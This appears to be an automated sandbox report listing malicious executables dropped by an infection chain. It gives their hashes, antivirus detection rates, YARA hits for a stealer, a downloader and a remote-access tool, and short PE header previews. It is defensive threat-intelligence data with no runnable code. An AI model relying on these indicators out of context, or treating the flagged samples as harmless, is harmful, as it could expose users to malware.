                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):773968
                                                                                                                                                                                                                                        Entropy (8bit):6.901559811406837
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                                                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                                                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                                                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                                                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
Preview: (PE header dump, not reproduced; recoverable section names: .text, .data, .rsrc, .reloc)
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:Windows setup INFormation
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                        Entropy (8bit):4.93007757242403
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                                                        MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                                                        SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                                                        SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                                                        SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
Preview (line breaks restored):
; nskbfltr.inf
;
; NS Keyboard Filter
;
;
; This inf file installs the WDF Framework binaries

[Version]
Signature="$Windows NT$"
Provider=NSL

;
;--- nskbfltr Coinstaller installation ------
;

[nskbfltr.NT.Wdf]
KmdfService = nskbfltr, nskbfltr_wdfsect

[nskbfltr_wdfsect]
KmdfLibraryVersion = 1.5
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33144
                                                                                                                                                                                                                                        Entropy (8bit):6.737780491933496
                                                                                                                                                                                                                                        Encrypted:false
SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:DCDE2248D19C778A41AA165866DD52D0
SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B
Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):77224
Entropy (8bit):6.793971095882093
Encrypted:false
SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
MD5:325B65F171513086438952A152A747C4
SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2138232
Entropy (8bit):7.940321732008107
Encrypted:false
SSDEEP:49152:VIfzw6NbHHBp7k5hhJ+j0h7x0vRNu1UiPPs0EkHbG+nu:VILwYt5ShrfKvW0z
MD5:E5F8753995C0B30B827AA2B17F3E1D22
SHA1:B268EE165073321CB893FC6DC682ADBE38AF87B5
SHA-256:C3A4EC523039D5969745279B8909FBB82BFC999D9241E24B5CEFEA23A3F2C04F
SHA-512:DBA6104720C45C3201878C515DAC487B0F66522E85DB56CF19B4378D4DA94D38E640EB48259A6CA3FD8602B083283915BDEBDC8BB57039F1CDD2FE84792BA2FA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 53%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L...~.r\............................y.............@.......................................@............................4.......<.......4............................n..T...........................(...@...............\...T... ....................text...d........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...4...........................@..@.reloc........... ...z..............@..B
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1880576
Entropy (8bit):7.947827107801024
Encrypted:false
SSDEEP:49152:ZRGDbjz7g+LRMpnd6dc8dwpW+8cYsjL1i:ZRGDrky0nd6dcmUT8AjL1i
MD5:FF279F4E5B1C6FBDA804D2437C2DBDC8
SHA1:2FEB3762C877A5AE3CA60EEEBC37003AD0844245
SHA-256:E115298AB160DA9C7A998E4AE0B72333F64B207DA165134CA45EB997A000D378
SHA-512:C7A8BBCB122B2C7B57C8B678C5EED075EE5E7C355AFBF86238282D2D3458019DA1A8523520E1A1C631CD01B555F7DF340545FD1E44AD678DC97C40B23428F967
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 81%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................0J...........@..........................`J.....i.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...xnuzvlhe.0..../......^..............@...tzuttanx..... J.....................@....taggant.0...0J.."..................@...
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):4460032
Entropy (8bit):7.985385064824602
Encrypted:false
SSDEEP:98304:uOsbw/GM4JTpF/dHkl1J000ReHSmC3J8qP/vbyN/I5i/H8CCW:1KGKJTpldHkl2mCbP/vbiN7C
MD5:04869F7ACE61605035664AF9589AF21B
SHA1:0688D7E4038F6103600011198EDECB98DF152221
SHA-256:957A5B78C870C0C648884B8EE30F5F437325C94212F4436566CCCBC3B88AA987
SHA-512:C78F3877D5ADB2847471B300D259B8875A8BA50A9FA1A1C3981C2A3316C8B5131E9D72D0E503557C14B4FD30A78B8D34C810AADE2EC6BDA4729DAF7FC2F8CCAE
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2..........PD...@...................................E...@... ............................._.a.s.....a.....................`....................................................................................... . .pa......>(.................@....rsrc.........a......N(.............@....idata ......a......P(.............@... ..8...a......R(.............@...yxuskcgf.....0.......T(.............@...pwerqsbo.............C.............@....taggant.0......"....C.............@...
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2866176
Entropy (8bit):6.525502925454382
Encrypted:false
SSDEEP:49152:HQVhw+9Pg4SnSuG7X6Mv+p7hE9YYBc9U6uq:HmhwUPg4SnSuG7X6xtEuYBc9Urq
MD5:05BB24F8C4105C056E6B5250B2A5E488
SHA1:08C3EE6A24FCF83ADC21D807371F5F01CA339892
SHA-256:82CDD20CCD714049CE3DC46DD095B0CF2642789E69B74BC1397AD3AABE3EE3D8
SHA-512:93622B8FF9166BCB33BD624900B7734DF4F1D9C60905917F17EDD762044FE89E2C167BAFE92C6C362CC4116CBEA6B8023EFFB28779D7F238F23581736596DD31
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@.......................... O.......,...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ygtpparq. *...$...*..|..............@...zzjdxvxy......N.......+.............@....taggant.0....N.."....+.............@...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3286016
                                                                                                                                                                                                                                        Entropy (8bit):7.310046848182974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yla31k0wuMKWrJSYQTdfjfkn46z2jnVGd7jyy7qaJJR0BmXSyYO3:yla3/tS4K2jnVGRjHLJfV
                                                                                                                                                                                                                                        MD5:C00A67D527EF38DC6F49D0AD7F13B393
                                                                                                                                                                                                                                        SHA1:7B8F2DE130AB5E4E59C3C2F4A071BDA831AC219D
                                                                                                                                                                                                                                        SHA-256:12226CCAE8C807641241BA5178D853AAD38984EEFB0C0C4D65ABC4DA3F9787C3
                                                                                                                                                                                                                                        SHA-512:9286D267B167CBA01E55E68C8C5582F903BED0DD8BC4135EB528EF6814E60E7D4DDA2B3611E13EFB56AA993635FBAB218B0885DAF5DAEA6043061D8384AF40CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V...............P.../..Z......../.. ....0...@.. ........................2...........@.................................../.K.....0.@W...................`2.....3./.............................................. ............... ..H............text...../.. ..../................. ..`.rsrc...@W....0..X..../.............@..@.reloc.......`2......"2.............@..B................../.....H...........@.......C...@...z.*.........................................6+.(B.99(....*..:+.(.^A.(!...*.....*....(*...*.....*.......*.......*....(*...*..0..........(*...8y.......E....c...O.../...8^...s......... .....:....&8....s.........8....s......... .....9....& ....8....s......... ....8....*s.........8.......0.............*.0.............*.0.............*.0.............*.0.............*....*.......*....0.............*.0.............*....*....0.............*....*...".......
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):810496
                                                                                                                                                                                                                                        Entropy (8bit):7.808597434734726
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:grtEhokkSG4bPWQ8C8z3zcB49CNPWQ8C8z3zcB49Cx:grGhokkSG4bPWQv8z3BYNPWQv8z3BYx
                                                                                                                                                                                                                                        MD5:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        SHA1:1D65F31526CC20AB41D6B1625D6674D7F13E326C
                                                                                                                                                                                                                                        SHA-256:B83449768E7AF68867C8BC42B19FF012722D88EA66AEF69DF48661E63E0EB15E
                                                                                                                                                                                                                                        SHA-512:80FAD90314FF639F538A72C5E4CA2BF9AE52B9309CAA7CD6F87D61791505BB3612B7F3190AB9B67348C5D71F4D29BB9D101E3F66D525EB9B5E2060A10B2D187A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P....p..........................x...........................x.......................`...|............................text...md.......f.................. ..`.rdata..............n..............@..@.data...,%... ......................@....CODE........P....... .............. ..`.tls.........`.......0..............@....rsrc........p.......2..............@..@.reloc..x............4..............@..B.bss.................R..............@....bss.........0......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):957952
                                                                                                                                                                                                                                        Entropy (8bit):7.9986004015143015
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:h2LddHrlBe4LpCuw8VYHcx5WK1zF7JkLYiY:mdZKspwDa5WK/JkLc
                                                                                                                                                                                                                                        MD5:5B99682CB740202D783DDE58CA97F045
                                                                                                                                                                                                                                        SHA1:CECAE054552CE295FEAA0717D2A33E870ADDCADD
                                                                                                                                                                                                                                        SHA-256:724E283E1BB29A150C9BEBC21BDF0E250E2D87257BF86C889BBE7544329C6882
                                                                                                                                                                                                                                        SHA-512:C37A2CB06407729344ADB85D814223A24EC4FA65F711C7F02C0E77395EC969B7E1BD64A6F5806D4E2D88C8461587D68B6AAE3378D2CF5C92F1ADE2AACC13F2B2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg................................. ........@.. ....................................`.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......h................!...............................................(....*..(....*.~....:....r...p.....(....o....s.........~....*.~....*.......*j(....r9..p~....o....t....*V.rI..p .......o....&*j(....(....r]..po....(....*2(.....o....*...0..g.........8.....(..........&......,.s......r...p(....o.....r...p(....o.....o .......io!..........9.....o".....*...................".6X....................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1114112
                                                                                                                                                                                                                                        Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                        MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                        SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                        SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                        SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4438776
                                                                                                                                                                                                                                        Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                        MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                        SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                        SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                        SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1861120
                                                                                                                                                                                                                                        Entropy (8bit):7.948090750964882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:1D3Z+og2dL7dT1TKvDXBujJ535WxkeQaJ4LAQJtbbY9mjrdprIt6vxM2c3WDLKoR:ZJTH/9hWxkeP2Mm7ra6pM2c3+XLl
                                                                                                                                                                                                                                        MD5:0A678F4E43E83079C1E95517F576A88D
                                                                                                                                                                                                                                        SHA1:4012A39B2F700273402D3ADBC54F0F87EAC2FA56
                                                                                                                                                                                                                                        SHA-256:6B17962E6298E3118F5301AF6BDCECCBF3C79663E4A526E128A5C306A232BC01
                                                                                                                                                                                                                                        SHA-512:C3EE30975F86B80DB6F8B0ED9A032924A12486528E0745D02E1E4372DE1775ECDA86CDD17C28586DCDDE1300A95C66579B707944DCDF445B21CCBA2F4FC6DF63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .@*..@.......\..............@...speiiqif....../......^..............@...suzusvsz.....pI......@..............@....taggant.0....I.."...D..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                                                                                        Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                                        MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                        SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                                        SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                                        SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....| .....(...+.| ...(....*.0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(......*.0..8.......s2.....(....}(.....}).....}'....|(.....(...+.|(...(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):776832
                                                                                                                                                                                                                                        Entropy (8bit):7.859727158445845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                                                                        MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                        SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                                                                        SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                                                                        SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2039808
                                                                                                                                                                                                                                        Entropy (8bit):7.95190511268852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:i8yCHGX33Su8Usgk5msPWY14O5Sb7D0Otq+qMnf/w4/T:iPXyuog/Av5/QFqMnf/ww
                                                                                                                                                                                                                                        MD5:6D4A011DDE3AE4DD05553B27D6FBFC75
                                                                                                                                                                                                                                        SHA1:EB13D57E83CA18083A52BD4927E6039A0AD87F1E
                                                                                                                                                                                                                                        SHA-256:DEC151D71C758D3ED3D86403DC1DEB28ECF80793144E32BC9EB0FC76D5209E86
                                                                                                                                                                                                                                        SHA-512:FDA917FEF5BA08FEB485AB713DD03CA8AD40A5F451698F29DC356ED067967EC866F9D93725F79E79E13D282C01AD2754E15C02E162497B6626CC8829196CB5C6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........M...........@...........................M.....RL....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..+..........V..............@...fhxxuwls......2......X..............@...vzpihbtm......M.....................@....taggant.0....M.."..................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):557056
                                                                                                                                                                                                                                        Entropy (8bit):7.97625978005819
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:m1yGb40nH4HBFqIx/d4SosozfXLnHNHOi+VHDXMEKMnjvzmrk:m1yiWFqIx/KSkbX7H1OiFEKMj7R
